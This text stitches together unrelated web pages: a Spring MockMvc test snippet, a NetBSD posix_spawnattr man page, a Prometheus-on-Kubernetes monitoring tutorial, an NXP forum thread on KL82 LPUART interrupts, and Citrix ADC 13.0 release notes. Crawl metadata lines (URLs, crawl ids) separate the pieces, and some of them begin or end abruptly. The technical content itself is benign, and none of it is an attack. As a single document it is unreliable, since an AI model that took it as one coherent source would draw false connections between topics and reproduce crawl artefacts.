public class SpringbootApp1ApplicationTests {

    private MockMvc mock;

    @Before
    public void init() {
        // Standalone setup: build MockMvc around the controller under test
        mock = MockMvcBuilders.standaloneSetup(new BookController()).build();
    }

    @Test
    public void testBookList() throws Exception {
        mock.perform(get("/"))
            .andExpect(status().isOk())
            .andExpect(view().name("bookList"))
            .andDo(print());
    }

    // ...
}
Conclusion
The Spring test framework integrates well with test frameworks such as JUnit, Mockito, and so on. As a result, unit and integration testing becomes easier, with more meaningful outcomes. Spring makes it simpler by leveraging annotation-based support. For example, with the Spring TestContext framework, we can use @RunWith, @WebAppConfiguration, and @ContextConfiguration to load a Spring configuration and inject a WebApplicationContext into the MockMvc.
This write-up is just a tip of the iceberg and provides a glimpse of what Spring offers with respect to unit and integration testing. Refer to the following links for a more elaborate explanation on this topic. | https://mobile.developer.com/java/data/what-is-spring-testing.html | CC-MAIN-2018-47 | en | refinedweb |
POSIX_SPAWNATTR_GETP... NetBSD Library Functions Manual POSIX_SPAWNATTR_GETP...
NAME
posix_spawnattr_getpgroup, posix_spawnattr_setpgroup -- get and set the spawn-pgroup attribute of a spawn attributes object
LIBRARY
Standard C Library (libc, -lc)
SYNOPSIS
#include <spawn.h>

int
posix_spawnattr_getpgroup(const posix_spawnattr_t *restrict attr,
    pid_t *restrict pgroup);

int
posix_spawnattr_setpgroup(posix_spawnattr_t *attr, pid_t pgroup);
DESCRIPTION
The posix_spawnattr_getpgroup() function obtains the value of the spawn-pgroup attribute from the attributes object referenced by attr. The posix_spawnattr_setpgroup() function sets the spawn-pgroup attribute in an initialized attributes object referenced by attr. The spawn-pgroup attribute represents the process group to be joined by the new process image in a spawn operation, if POSIX_SPAWN_SETPGROUP is set in the spawn-flags attribute.
RETURN VALUES
The posix_spawnattr_getpgroup() and posix_spawnattr_setpgroup() functions return zero.
SEE ALSO
posix_spawn(3), posix_spawnattr_destroy(3), posix_spawnattr_init(3), posix_spawnp(3)
STANDARDS
The posix_spawnattr_getpgroup() and posix_spawnattr_setpgroup() functions conform to IEEE Std 1003.1-2001 (``POSIX.1'').
HISTORY
The posix_spawnattr_getpgroup() and posix_spawnattr_setpgroup() functions first appeared in FreeBSD 8.0 and imported for NetBSD 6.0.
AUTHORS
Ed Schouten <ed@FreeBSD.org> NetBSD 9.99 December 20, 2011 NetBSD 9.99 | https://man.netbsd.org/iamd64/posix_spawnattr_setpgroup.3 | CC-MAIN-2021-17 | en | refinedweb |
An introduction to monitoring with Prometheus | Opensource.com
An introduction to monitoring with Prometheus
Prometheus is a popular and powerful toolkit to monitor Kubernetes. This is a tutorial on how to get started.
Metrics are the primary way to represent both the overall health of your system and any other specific information you consider important for monitoring and alerting or observability. Prometheus is a leading open source metric instrumentation, collection, and storage toolkit built at SoundCloud beginning in 2012. Since then, it's graduated from the Cloud Native Computing Foundation and become the de facto standard for Kubernetes monitoring. It has been covered in some detail in:
- Getting started with Prometheus
- 5 examples of Prometheus monitoring success
- Achieve high-scale application monitoring with Prometheus
- Tracking the weather with Python and Prometheus
However, none of these articles focus on how to use Prometheus on Kubernetes. This article:
- Describes the Prometheus architecture and data model to help you understand how it works and what it can do
- Provides a tutorial on setting Prometheus up in a Kubernetes cluster and using it to monitor clusters and applications
Architecture
While knowing how Prometheus works may not be essential to using it effectively, it can be helpful, especially if you're considering using it for production. The Prometheus documentation provides this graphic and details about the essential elements of Prometheus and how the pieces connect together.
For most use cases, you should understand three major components of Prometheus:
- The Prometheus server scrapes and stores metrics. Note that it uses a persistence layer, which is part of the server and not expressly mentioned in the documentation. Each node of the server is autonomous and does not rely on distributed storage. I'll revisit this later when looking to use a dedicated time-series database to store Prometheus data, rather than relying on the server itself.
- The web UI allows you to access, visualize, and chart the stored data. Prometheus provides its own UI, but you can also configure other visualization tools, like Grafana, to access the Prometheus server using PromQL (the Prometheus Query Language).
- Alertmanager sends alerts from client applications, especially the Prometheus server. It has advanced features for deduplicating, grouping, and routing alerts and can route through other services like PagerDuty and OpsGenie.
The key to understanding Prometheus is that it fundamentally relies on scraping, or pulling, metrics from defined endpoints. This means that your application needs to expose an endpoint where metrics are available and instruct the Prometheus server how to scrape it (this is covered in the tutorial below). There are exporters for many applications that do not have an easy way to add web endpoints, such as Kafka and Cassandra (using the JMX exporter).
Data model

Now that you understand how Prometheus works to scrape and store metrics, the next thing to learn is the kinds of metrics Prometheus supports. Some of the following information (noted with quotation marks) comes from the metric types section of the Prometheus documentation.
Counters and gauges
The two simplest metric types are counter and gauge. When getting started with Prometheus (or with time-series monitoring more generally), these are the easiest types to understand because it's easy to connect them to values you can imagine monitoring, like how much system resources your application is using or how many events it has processed.
"A counter is a cumulative metric that represents a single monotonically increasing counter whose value can only increase or be reset to zero on restart. For example, you can use a counter to represent the number of requests served, tasks completed, or errors."
Because you cannot decrease a counter, it can and should be used only to represent cumulative metrics.
"A gauge is a metric that represents a single numerical value that can arbitrarily go up and down. Gauges are typically used for measured values like [CPU] or current memory usage, but also 'counts' that can go up and down, like the number of concurrent requests."
Histograms and summaries
Prometheus supports two more complex metric types: histograms and summaries. There is ample opportunity for confusion here, given that they both track the number of observations and the sum of observed values. One of the reasons you might choose to use them is that you need to calculate an average of the observed values. Note that they create multiple time series in the database; for example, they each create a sum of the observed values with a _sum suffix.
"A histogram samples observations (usually things like request durations or response sizes) and counts them in configurable buckets. It also provides a sum of all observed values."
This makes it an excellent candidate to track things like latency that might have a service level objective (SLO) defined against it. From the documentation:
You might have an SLO to serve 95% of requests within 300 ms. In that case, configure a histogram to have a bucket with an upper limit of 0.3 seconds. You can then directly express the relative amount of requests served within 300 ms and easily alert if the value drops below 0.95.
Returning to definitions:
"Similar to a histogram, a summary samples observations (usually things like request durations and response sizes). While it also provides a total count of observations and a sum of all observed values, it calculates configurable quantiles over a sliding time window."
If you are still confused, I suggest taking the following approach:
- Use gauges most of the time for straightforward time-series metrics.
- Use counters for things you know to increase monotonically, e.g., if you are counting the number of times something happens.
- Use histograms for latency measurements with simple buckets, e.g., one bucket for "under SLO" and another for "over SLO."
This should be sufficient for the overwhelming majority of use cases, and you should rely on a statistical analysis expert to help you with more advanced scenarios.
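To make the bucket mechanics concrete, here is a toy sketch of how a histogram metric accumulates observations (illustrative only, not the Prometheus client library):

```python
class ToyHistogram:
    """Cumulative buckets plus the _sum and _count series a histogram exposes."""

    def __init__(self, buckets):
        self.upper_bounds = sorted(buckets) + [float("inf")]  # implicit +Inf bucket
        self.bucket_counts = [0] * len(self.upper_bounds)
        self.sum = 0.0
        self.count = 0

    def observe(self, value):
        self.sum += value
        self.count += 1
        for i, bound in enumerate(self.upper_bounds):
            if value <= bound:
                self.bucket_counts[i] += 1  # buckets are cumulative

# Latency in ms against a 100ms SLO, with buckets {100, 400} as in the text
h = ToyHistogram([100, 400])
for latency in [42, 90, 150, 480]:
    h.observe(latency)

print(h.bucket_counts)  # [2, 3, 4] -> <=100, <=400, +Inf
print(h.count, h.sum)   # 4 762.0
```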
Now that you have a basic understanding of what Prometheus is, how it works, and the kinds of data it can collect and store, you're ready to begin the tutorial.
Prometheus and Kubernetes hands-on tutorial
This tutorial covers the following:
- Installing Prometheus in your cluster
- Downloading the sample application and reviewing the code
- Building and deploying the app and generating load against it
- Accessing the Prometheus UI and reviewing the basic metrics
This tutorial assumes:
- You already have a Kubernetes cluster deployed.
- You have configured the kubectl command-line utility for access.
- You have the cluster-admin role (or at least sufficient privileges to create namespaces and deploy applications).
- You are running a Bash-based command-line interface. Adjust this tutorial if you run other operating systems or shell environments.
If you don't have Kubernetes running yet, this Minikube tutorial is an easy way to set it up on your laptop.
If you're ready now, let's go.
Install Prometheus
In this section, you will clone the sample repository and use Kubernetes' configuration files to deploy Prometheus to a dedicated namespace.
- Clone the sample repository locally and use it as your working directory:
$ git clone
$ cd prometheus-demo
$ WORKDIR=$(pwd)
- Create a dedicated namespace for the Prometheus deployment:
$ kubectl create namespace prometheus
- Give your namespace the cluster reader role:
$ kubectl apply -f $WORKDIR/kubernetes/clusterRole.yaml
clusterrole.rbac.authorization.k8s.io/prometheus created
clusterrolebinding.rbac.authorization.k8s.io/prometheus created
- Create a Kubernetes configmap with scraping and alerting rules:
$ kubectl apply -f $WORKDIR/kubernetes/configMap.yaml -n prometheus
configmap/prometheus-server-conf created
- Deploy Prometheus:
$ kubectl create -f prometheus-deployment.yaml -n prometheus
deployment.extensions/prometheus-deployment created
- Validate that Prometheus is running:
$ kubectl get pods -n prometheus
NAME READY STATUS RESTARTS AGE
prometheus-deployment-78fb5694b4-lmz4r 1/1 Running 0 15s
Review basic metrics
In this section, you'll access the Prometheus UI and review the metrics being collected.
- Use port forwarding to enable web access to the Prometheus UI locally:
Note: Your prometheus-deployment will have a different name than this example. Review and replace the name of the pod from the output of the previous command.
$ kubectl port-forward prometheus-deployment-7ddb99dcb-fkz4d 8080:9090 -n prometheus
Forwarding from 127.0.0.1:8080 -> 9090
Forwarding from [::1]:8080 -> 9090
- Go to http://localhost:8080 in a browser:
You are now ready to query Prometheus metrics!
- Some basic machine metrics (like the number of CPU cores and memory) are available right away. For example, enter machine_memory_bytes in the expression field, switch to the Graph view, and click Execute to see the metric charted:
- Containers running in the cluster are also automatically monitored. For example, enter rate(container_cpu_usage_seconds_total{container_name="prometheus"}[1m]) as the expression and click Execute to see the rate of CPU usage by Prometheus:
Now that you know how to install Prometheus and use it to measure some out-of-the-box metrics, it's time for some real monitoring.
Golden signals
As described in the "Monitoring Distributed Systems" chapter of Google's SRE book:
"The four golden signals of monitoring are latency, traffic, errors, and saturation. If you can only measure four metrics of your user-facing system, focus on these four."
The book offers thorough descriptions of all four, but this tutorial focuses on the three signals that most easily serve as proxies for user happiness:
- Traffic: How many requests you're receiving
- Error rate: How many of those requests you can successfully serve
- Latency: How quickly you can serve successful requests
As you probably realize by now, Prometheus does not measure any of these for you; you'll have to instrument any application you deploy to emit them. Following is an example implementation.
Open the $WORKDIR/node/golden_signals/app.js file, which is a sample application written in Node.js (recall we cloned yuriatgoogle/prometheus-demo and exported $WORKDIR earlier). Start by reviewing the first section, where the metrics to be recorded are defined:
// total requests - counter
const nodeRequestsCounter = new prometheus.Counter({
name: 'node_requests',
help: 'total requests'
});
The first metric is a counter that will be incremented for each request; this is how the total number of requests is counted:
// failed requests - counter
const nodeFailedRequestsCounter = new prometheus.Counter({
name: 'node_failed_requests',
help: 'failed requests'
});
The second metric is another counter that increments for each error to track the number of failed requests:
// latency - histogram
const nodeLatenciesHistogram = new prometheus.Histogram({
name: 'node_request_latency',
help: 'request latency by path',
labelNames: ['route'],
buckets: [100, 400]
});
The third metric is a histogram that tracks request latency. Working with a very basic assumption that the SLO for latency is 100ms, you will create two buckets: one for 100ms and the other for 400ms.
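Prometheus histogram buckets are cumulative: an observation is counted in every bucket whose upper bound (le) is greater than or equal to the observed value, plus an implicit +Inf bucket. Here is a standalone sketch (not part of the sample app) of how the two bounds above would classify some latencies:

```javascript
// Sketch: how cumulative Prometheus histogram buckets count observations.
// An observed value is counted in every bucket whose upper bound (le) is
// greater than or equal to the value, plus the implicit +Inf bucket.
function bucketCounts(observations, bounds) {
  const counts = new Map(bounds.map((b) => [b, 0]));
  counts.set(Infinity, 0);
  for (const v of observations) {
    for (const b of bounds) {
      if (v <= b) counts.set(b, counts.get(b) + 1);
    }
    counts.set(Infinity, counts.get(Infinity) + 1);
  }
  return counts;
}

const counts = bucketCounts([42, 250, 900], [100, 400]);
console.log(counts.get(100)); // 1 (only the 42 ms request is <= 100 ms)
console.log(counts.get(400)); // 2 (42 ms and 250 ms)
console.log(counts.get(Infinity)); // 3 (every request)
```

This cumulative layout is what makes the bucket-over-count ratio queries later in the tutorial work.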
The next section handles incoming requests, increments the total requests metric for each one, increments failed requests when there is an (artificially induced) error, and records a latency histogram value for each successful request. I have chosen not to record latencies for errors; that implementation detail is up to you.
app.get('/', (req, res) => {
// start latency timer
const requestReceived = new Date().getTime();
console.log('request made');
// increment total requests counter
nodeRequestsCounter.inc();
// return an error 1% of the time
if (Math.floor(Math.random() * 100) === 0) {
// increment error counter
nodeFailedRequestsCounter.inc();
// return error code
res.status(500).send("error!");
}
else {
// delay for a bit
sleep.msleep((Math.floor(Math.random() * 1000)));
// record response latency
const responseLatency = new Date().getTime() - requestReceived;
nodeLatenciesHistogram
.labels(req.route.path)
.observe(responseLatency);
res.send("success in " + responseLatency + " ms");
}
})
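One detail worth checking in handlers like this: Math.floor(Math.random() * 100) yields an integer from 0 through 99, so comparing it against a single value in that range triggers the error branch about 1% of the time. A standalone sketch (not part of app.js) that estimates the rate:

```javascript
// Standalone sketch: estimate how often the error branch fires when a
// handler compares Math.floor(Math.random() * 100) (an integer 0-99)
// against a single value in that range.
function errorRate(trials) {
  let errors = 0;
  for (let i = 0; i < trials; i++) {
    if (Math.floor(Math.random() * 100) === 0) errors++;
  }
  return errors / trials;
}

const rate = errorRate(100000);
console.log(rate); // close to 0.01, i.e. roughly 1% of requests
```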
Test locally
Now that you've seen how to implement Prometheus metrics, see what happens when you run the application.
- Install the required packages:
$ cd $WORKDIR/node/golden_signals
$ npm install --save
- Launch the app:
$ node app.js
- Open two browser tabs: one to the application's home page and another to its /metrics page.
- When you go to the /metrics page, you can see the Prometheus metrics being collected and updated every time you reload the home page:
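When you load /metrics, each metric appears in the Prometheus text exposition format. With the counters defined earlier, the relevant lines look roughly like this (the sample values are illustrative):

```text
# HELP node_requests total requests
# TYPE node_requests counter
node_requests 42

# HELP node_failed_requests failed requests
# TYPE node_failed_requests counter
node_failed_requests 1
```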
You're now ready to deploy the sample application to your Kubernetes cluster and test your monitoring.
Deploy monitoring to Prometheus on Kubernetes
Now it's time to see how metrics are recorded and represented in the Prometheus instance deployed in your cluster by:
- Building the application image
- Deploying it to your cluster
- Generating load against the app
- Observing the metrics recorded
Build the application image
The sample application provides a Dockerfile you'll use to build the image. This section assumes that you have:
- Docker installed and configured locally
- A Docker Hub account
- Created a repository
If you're using Google Kubernetes Engine to run your cluster, you can use Cloud Build and the Google Container Registry instead.
- Switch to the application directory:
$ cd $WORKDIR/node/golden_signals
- Build the image with this command:
$ docker build . --tag=<Docker username>/prometheus-demo-node:latest
- Make sure you're logged in to Docker Hub:
$ docker login
- Push the image to Docker Hub using this command:
$ docker push <username>/prometheus-demo-node:latest
- Verify that the image is available:
$ docker images
Deploy the application
Now that the application image is in the Docker Hub, you can deploy it to your cluster and run the application.
- Modify the $WORKDIR/node/golden_signals/prometheus-demo-node.yaml file to pull the image from Docker Hub:
spec:
containers:
- image: docker.io/<Docker username>/prometheus-demo-node:latest
- Deploy the image:
$ kubectl apply -f $WORKDIR/node/golden_signals/prometheus-demo-node.yaml
deployment.extensions/prometheus-demo-node created
- Verify that the application is running:
$ kubectl get pods
NAME READY STATUS RESTARTS AGE
prometheus-demo-node-69688456d4-krqqr 1/1 Running 0 65s
- Expose the application using a load balancer:
$ kubectl expose deployment prometheus-demo-node --type=LoadBalancer --name=prometheus-demo-node --port=8080
service/prometheus-demo-node exposed
- Confirm that your service has an external IP address:
$ kubectl get services
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kubernetes ClusterIP 10.39.240.1 <none> 443/TCP 23h
prometheus-demo-node LoadBalancer 10.39.248.129 35.199.186.110 8080:31743/TCP 78m
Generate load to test monitoring
Now that your service is up and running, generate some load against it by using Apache Bench.
- Get the IP address of your service as a variable:
$ export SERVICE_IP=$(kubectl get svc prometheus-demo-node -ojson | jq -r '.status.loadBalancer.ingress[].ip')
- Use ab to generate some load. You may want to run this in a separate terminal window.
$ ab -c 3 -n 1000 http://${SERVICE_IP}:8080/
Review metrics
While the load is running, access the Prometheus UI in the cluster again and confirm that the "golden signal" metrics are being collected.
- Establish a connection to Prometheus:
$ kubectl get pods -n prometheus
NAME READY STATUS RESTARTS AGE
prometheus-deployment-78fb5694b4-lmz4r 1/1 Running 0 15s
$ kubectl port-forward prometheus-deployment-78fb5694b4-lmz4r 8080:9090 -n prometheus
Forwarding from 127.0.0.1:8080 -> 9090
Forwarding from [::1]:8080 -> 9090
Note: Make sure to replace the name of the pod in the second command with the output of the first.
- Open http://localhost:8080 in a browser:
- Use this expression to measure the request rate:
rate(node_requests[1m])
- Use this expression to measure your error rate:
rate(node_failed_requests[1m])
- Finally, use this expression to validate your latency SLO. Remember that you set up two buckets, 100ms and 400ms. This expression returns the percentage of requests that meet the SLO:
sum(rate(node_request_latency_bucket{le="100"}[1h])) / sum(rate(node_request_latency_count[1h]))
About 10% of the requests are within the SLO. This is what you should expect, since the code sleeps for a random number of milliseconds between 0 and 1,000. As a result, about 90% of the time it takes more than 100ms to respond, and the graph shows that you can't meet the latency SLO.
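To make the arithmetic behind that expression concrete: rate() over a window is (later counter value - earlier value) / window seconds, so the window length cancels when the two rates are divided, leaving the fraction of new observations that landed in the le="100" bucket. A standalone sketch (variable names and sample values are illustrative):

```javascript
// Standalone sketch of the arithmetic behind the PromQL SLO expression.
// rate() over a window is (later - earlier) / windowSeconds, so the window
// cancels when the two rates are divided, leaving the fraction of new
// observations that landed in the le="100" bucket.
function sloRatio(bucketEarlier, bucketLater, countEarlier, countLater) {
  return (bucketLater - bucketEarlier) / (countLater - countEarlier);
}

// Illustrative samples: 12 of 120 new requests fell in the <=100 ms bucket.
console.log(sloRatio(100, 112, 1000, 1120)); // 0.1
```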
Summary
Congratulations! You've completed the tutorial and hopefully have a much better understanding of how Prometheus works, how to instrument your application with custom metrics, and how to use it to measure your SLO compliance. The next article in this series will look at another metric instrumentation approach using OpenCensus.
I am working on a project with a KL82 FRDM board that will use the LPUART API to send "non-blocking" data intermittently as well as receive data through an interrupt. I am using the LPUART_TransferSendNonBlocking function to send packets of data, but I also want to use the LPUART_IRQHandler whenever a byte is received. It seems that I can use the two separately, but I cannot use them together. I have seen some examples that use the LPUART_TransferReceiveNonBlocking function to receive bytes, but the packets expected to be received have different lengths, and I believe the callback function will only trigger once that number of bytes has been received.
My example provided basically sends 26 bytes using the LPUART_TransferSendNonBlocking function, send one byte in the callback, and repeats every half a second. I want to be able to receive bytes on interrupt though with the LPUART1_IRQHandler function.
If anyone knows why this method doesn't work or knows of a better solution using this API please let me know!
Thanks,
Ronnie
Hi
Have you tried using the ring buffer to receive data?
First, create a handle using LPUART_TransferCreateHandle.
For tx, call LPUART_TransferSendNonBlocking to send a fixed length of data.
For rx, call LPUART_TransferStartRingBuffer to start the ring buffer. The received data is stored in the ring buffer first; then, if you want to read data from the ring buffer, call LPUART_TransferGetRxRingBufferLength to get how many bytes are currently available in the ring buffer (x bytes), then call LPUART_TransferReceiveNonBlocking to read x bytes out of the ring buffer.
Yes I have looked at this example and seen the function with the following parameters as well:
LPUART_TransferReceiveNonBlocking(DEMO_LPUART, &g_lpuartHandle, &receiveXfer, NULL);
The problem I have with using this function is that receiveXfer needs a "dataSize" attached to it to indicate how many bytes are to be received before calling the interrupt. The data packets that I expect to receive in my protocol varies from a single byte up to 256 bytes and any in between. I would ideally want to have the interrupt called for each byte or once the last byte is received- but there is no way of knowing when the last byte will be received.
Hi ronald_j_chasse,
Thanks for your updated information.
If you don't want this type of API, and want to receive your own protocol varying from a single byte up to any number of bytes, I think you can just enable the Receive Interrupt to receive the UART data. Then you can design your own ISR; in the UART ISR, you can use a counter to count your received data.
This is a very common customer usage.
From the UART module side, after you enable the UART to receive an interrupt when one UART data is coming, then it will trigger one UART receive interrupt, in the UART ISR, you just need to check whether the interrupt is caused by the received interrupt, then you can do your own code.
You don't have to use the LPUART_TransferReceiveNonBlocking API at all; you can write your own API that just enables the receive interrupt, and then do your own code in the ISR.
-----------------------------------------------------------------------------
Thanks for your input! I still have some questions though.
I still want to use the LPUART_TransferSendNonBlocking function from the API. I do not know how to use the receive interrupt or create my own ISR for it. I have used the LPUART1_IRQHandler ISR to handle the received bytes, but it seems like I cannot use it while using the LPUART_TransferSendNonBlocking function. I want to be able to use BOTH the LPUART_TransferSendNonBlocking function AND some kind of interrupt for receiving 1 byte at a time.
Thanks!
Hi ronald_j_chasse,
If you want to enable both the TX and RX interrupt, you just need to enable both LPUARTx_CTRL[TIE] and LPUARTx_CTRL[RIE]. For more details, please check the CTRL register description in the KL82 reference manual.
So, you can use this API:
LPUART_EnableInterrupts(base, kLPUART_TxDataRegEmptyInterruptEnable | kLPUART_RxDataRegFullInterruptEnable);
About the interrupt, please check:
static void HAL_UartInterruptHandle(uint8_t instance)
{
    hal_uart_state_t *uartHandle = s_UartState[instance];
    uint32_t status;
    if (NULL == uartHandle)
    {
        return;
    }
    status = LPUART_GetStatusFlags(s_LpuartAdapterBase[instance]);
    /* Receive data register full */
    if ((LPUART_STAT_RDRF_MASK & status) &&
        (LPUART_GetEnabledInterrupts(s_LpuartAdapterBase[instance]) & kLPUART_RxDataRegFullInterruptEnable))
    {
        if (uartHandle->rx.buffer)
        {
            uartHandle->rx.buffer[uartHandle->rx.bufferSofar++] = LPUART_ReadByte(s_LpuartAdapterBase[instance]);
            if (uartHandle->rx.bufferSofar >= uartHandle->rx.bufferLength)
            {
                LPUART_DisableInterrupts(s_LpuartAdapterBase[instance],
                                         kLPUART_RxDataRegFullInterruptEnable | kLPUART_RxOverrunInterruptEnable);
                if (uartHandle->callback)
                {
                    uartHandle->rx.buffer = NULL;
                    uartHandle->callback(uartHandle, kStatus_HAL_UartRxIdle, uartHandle->callbackParam);
                }
            }
        }
    }
    /* Send data register empty and the interrupt is enabled. */
    if ((LPUART_STAT_TDRE_MASK & status) &&
        (LPUART_GetEnabledInterrupts(s_LpuartAdapterBase[instance]) & kLPUART_TxDataRegEmptyInterruptEnable))
    {
        if (uartHandle->tx.buffer)
        {
            LPUART_WriteByte(s_LpuartAdapterBase[instance], uartHandle->tx.buffer[uartHandle->tx.bufferSofar++]);
            if (uartHandle->tx.bufferSofar >= uartHandle->tx.bufferLength)
            {
                LPUART_DisableInterrupts(s_LpuartAdapterBase[uartHandle->instance],
                                         kLPUART_TxDataRegEmptyInterruptEnable);
                if (uartHandle->callback)
                {
                    uartHandle->tx.buffer = NULL;
                    uartHandle->callback(uartHandle, kStatus_HAL_UartTxIdle, uartHandle->callbackParam);
                }
            }
        }
    }
#if 1
    LPUART_ClearStatusFlags(s_LpuartAdapterBase[instance], status);
#endif
}
#endif
#endif
You can also do the operation in the callback function.
-----------------------------------------------------------------------------
The QTelephony namespace contains telephony-related enumerated type definitions.
#include <QTelephony>
Inherits QObject.
The QTelephony namespace contains telephony-related enumerated type definitions.
Class of call to effect with a call forwarding, call barring, or call waiting change.
Availability of a network operator within QNetworkRegistration::AvailableOperator.
Mode that was requested when the operator was selected.
Indicates the current network registration state.
Result codes for telephony operations, based on the GSM specifications.
Error codes for SIM file operations via QBinarySimFile and QRecordBasedSimFile.
Type of files within a SIM that are accessible via QSimFiles.
Release Notes for Citrix ADC 13.0-71.40 Release
Notes
- This release notes document does not include security related fixes. For a list of security related fixes and advisories, see the Citrix security bulletin.
What's New
Authentication, authorization, and auditing
Azure Gov support for token authentication in Microsoft Intune integration
In the Citrix Gateway and Microsoft Intune integration scenario, Citrix Gateway now supports the Microsoft Azure Government (Azure Gov) infrastructure for Azure Active Directory Authentication Library (ADAL) token authentication. Previously, only the Microsoft Azure commercial infrastructure was supported.[ NSAUTH-8246 ]
Citrix Gateway
Support for dynamic secure DNS update on Windows plug-in
VPN plug-in for Windows now supports Secure DNS update. This feature is disabled by default. To enable it, create HKEY_LOCAL_MACHINE\SOFTWARE\Citrix\Secure Access Client\secureDNSUpdate value of type REG_DWORD and set it to 1.
[ CGOP-13788 ]
- When you set the value to 1, the VPN plug-in tries the unsecure DNS update first. If the unsecure DNS update fails, the VPN plug-in tries the secure DNS update.
- To try only the secure DNS update, you can set the value to 2.
Citrix Web App Firewall
Device fingerprinting bot detection technique for mobile (Android) applications using Bot Mobile SDK
The device fingerprinting bot detection mechanism is now enhanced to secure mobile (Android) applications from bot attacks. To detect bots in a mobile application, the device fingerprinting detection technique uses a bot mobile SDK. The SDK is integrated with the mobile application to intercept the mobile traffic, collect client and device details, and send the data to the appliance. On the appliance side, the device fingerprinting bot detection technique examines the data and determines whether the connection is from a bot or a human.[ NSWAF-5983 ]
Load Balancing
Support for file-based pattern sets
The Citrix ADC appliance now supports file-based pattern sets.
You can import a new pattern set file into the Citrix ADC appliance using the following command:
import patsetfile <src> <name> -overwrite -delimiter <char> -charset <ASCII | UTF_8>
You can update an existing pattern set file on the Citrix ADC appliance using the following command:
update patsetfile <patset filename>
You can add a pattern set file to the packet engine using the following command:
add patsetfile <patset filename>
You can bind patterns to the pattern set file using the following command:
add patset <name> -patsetfile <patset filename>[ NSLB-5823 ]
MQTT protocol support on Citrix ADC appliances
Citrix ADC appliances now natively support the Message Queuing Telemetry Transport (MQTT) protocol. MQTT is an OASIS standard messaging protocol for the Internet of Things (IoT). With this support, the Citrix ADC appliance can be used in IoT deployments to load balance MQTT traffic.
Previously, you could configure MQTT on the Citrix ADC appliance by using protocol extensions. Users had to write their own extension code and import the extension file to the Citrix ADC appliance, from either a web server (using HTTP) or local workstation.[ NSLB-5822 ]
Networking
Support added in Citrix ADC CPX for Cilium CNI in a Kubernetes environment
Citrix ADC CPX now supports Cilium CNI in a Kubernetes environment. Cilium is an open-source CNI which uses the extended version of the Berkeley Packet Filter (BPF) to improve the visibility, performance, and scalability of applications on Kubernetes.[ NSNET-17264 ]
Configure the Citrix ADC appliance to source Citrix ADC FreeBSD data traffic from a SNIP address
Some Citrix ADC data features run on the underlying FreeBSD OS instead of on the Citrix ADC OS. Because of this reason, these features send traffic sourced from the Citrix ADC IP (NSIP) address instead of sourced from a SNIP address. Sourcing the data traffic from the NSIP address is not desirable if your setup has configurations to separate all management and data traffic.
The following Citrix ADC data features run on the underlying FreeBSD OS and send traffic sourced from the Citrix ADC IP (NSIP) address:
- Load balancing scriptable monitors
- GSLB autosync
To resolve this issue, a global Layer-2 parameter "useNetprofileBSDtraffic" has been introduced. When this parameter is enabled, the Citrix ADC features send traffic sourced from one of the SNIP addresses in a netprofile associated with the feature.
Currently, the global Layer-2 parameter "useNetprofileBSDtraffic" is supported only for load balancing scriptable monitors.
For configuring the Citrix ADC appliance to source GSLB autosync traffic from a SNIP address, you can use extended ACL and RNAT rules as a workaround.[ NSNET-16274 ]
Dataset based extended ACLs
A large number of ACLs are required in an enterprise. Configuring and managing a large number of ACLs is very difficult and cumbersome when they require frequent changes.
A Citrix ADC appliance now supports datasets in extended ACLs. Dataset is an existing feature of a Citrix ADC appliance. A dataset is an array of indexed patterns of types: number (integer), IPv4 address, or IPv6 address.
Dataset support in extended ACLs is useful for creating multiple ACL rules, which require common ACL parameters. While creating an ACL rule, instead of specifying the common parameters, you can specify a dataset, which includes these common parameters.
Any changes made in the dataset are automatically reflected in the ACL rules that are using this dataset. ACLs with datasets are easier to configure and manage. They are also smaller and easier to read than the conventional ACLs.
Currently, the Citrix ADC appliance supports only the IPv4 address type dataset for extended ACLs.[ NSNET-8252 ]
Platform
VMware ESX 7.0 support on Citrix ADC VPX instance
The Citrix ADC VPX instance now supports the VMware ESX hypervisor 7.0 build 1632494.[ NSPLAT-16902 ]
AWS Top Secret (C2S) region support extended for all the Citrix ADC editions
The AWS Top Secret (C2S) region now supports all the following Citrix ADC editions along with Bring Your Own License (BYOL):
- Standard Edition
- Advanced Edition
- Premium Edition
Previously, the AWS Top Secret region supported only the BYOL subscription.
The AWS Top Secret region is readily available through the Commercial Cloud Services (C2S) contract with AWS.[ NSPLAT-9195 ]
Policies
Support for dynamic expressions in the CONTAINS function for optimizing advanced policy usage
Previously, the argument for each of the following methods had to be static:
- contains()
- after_str()
- before_str()
- substr()
- strip_end_chars()
- strip_chars()
- strip_start_chars()
[ NSPOLICY-3545 ]
SSL
Support to offload crypto operations to Intel Coleto crypto chips in TLS 1.3 connections
In TLS 1.3 connections, support is now added to offload crypto operations to Intel Coleto crypto chips on specific Citrix ADC MPX platforms.
The following appliances that ship with Intel Coleto chips are supported:
MPX 5900
MPX/SDX 8900
MPX/SDX 15000
MPX/SDX 15000-50G
MPX/SDX 26000
MPX/SDX 26000-50S
MPX/SDX 26000-100G
Software-only support for the TLSv1.3 protocol is available on all other Citrix ADC MPX and SDX appliances except Citrix ADC FIPS appliances.[ NSSSL-7453 ]
All subject alternate name (SAN) values are now displayed in a certificate
A Citrix ADC appliance now displays all the SAN values when the details of a certificate are displayed.[ NSSSL-5978 ]
Policy support for TLSv1.3 protocol
When TLSv1.3 protocol is negotiated for a connection, policy rules that inspect TLS data received from the client now trigger the configured action.
For example, if the following policy rule returns true, the traffic is forwarded to the virtual server defined in the action.
add ssl action action1 -forward vserver2
add ssl policy pol1 -rule client.ssl.client_hello.sni.contains(xyz) -action action1[ NSSSL-869 ]
System
Display CPU usage (in parts per thousand) for a load balancing virtual server
A new counter, "CPU-PM", now displays the statistical data for the CPU usage in per-mille (parts per thousand). For example, 500 must be read as 500/1000, which is equal to 50 percent.
In GUI, navigate to Traffic Management > Virtual Servers > Load Balancing > Statistics[ NSBASE-11304 ]
Support for request retry on timeout
Request retry is now available for one more scenario where, if a back-end server takes more time to respond to requests, the appliance performs re-load balancing upon timeout and forwards the request to the next available server. Previously, the appliance kept waiting for a server response, which led to an increased RTT.
To perform timeout, a new parameter, retryOnTimeout (in milliseconds), is configurable in the AppQoE action. Minimum value: 30
Maximum value: 2000.
To configure request retry on timeout by using the CLI:
add appqoe action <name> -retryOnTimeout <msecs>
Example
add appqoe action appact1 -retryOnTimeout 35[ NSBASE-10914 ]
Process local and retain connections support for MPTCP cluster deployments
MPTCP connections now support "Process Local" and "Retain Connections" features in the cloud and on-premises Citrix ADC cluster deployments.[ NSBASE-10734 ]
Responder response-related information in AppFlow records
